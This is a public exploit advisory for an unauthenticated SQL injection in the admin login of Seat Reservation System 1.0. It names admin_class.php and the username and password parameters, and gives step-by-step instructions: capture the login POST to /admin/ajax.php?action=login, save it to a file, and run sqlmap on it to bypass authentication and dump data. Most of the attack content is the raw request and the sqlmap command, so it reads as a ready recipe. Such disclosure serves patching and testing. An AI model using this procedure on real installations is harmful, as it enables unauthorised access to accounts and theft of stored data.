Seat Reservation System 1.0 SQL Injection

Seat Reservation System version 1.0 suffers from an unauthenticated remote SQL injection vulnerability.

MD5 | 4db79f048b2d69b73114c2fce6c9d015

# Title: Seat Reservation System 1.0 - Unauthenticated SQL Injection
# Exploit Author: Rahul Ramkumar
# Date: 2020-09-16
# Vendor Homepage:
# Software Link:
# Version: 1.0

# Description

The file admin_class.php does not perform input validation on the username
and password parameters. An attacker can send malicious input in the post
request to /admin/ajax.php?action=login and bypass authentication, extract
sensitive information etc.


1) Navigate to the admin login page


2) Fill in dummy values for 'username' and 'password' fields and send the
request via an HTTP intercept tool

3) Save the request to file. Example, seat_reservation_sqli.req

POST /seat_reservation/admin/ajax.php?action=login HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 32
DNT: 1
Connection: close


4) Run SQLmap on the file,

sqlmap -r seat_reservation_sqli.req --dbms=mysql --threads=10

Related Posts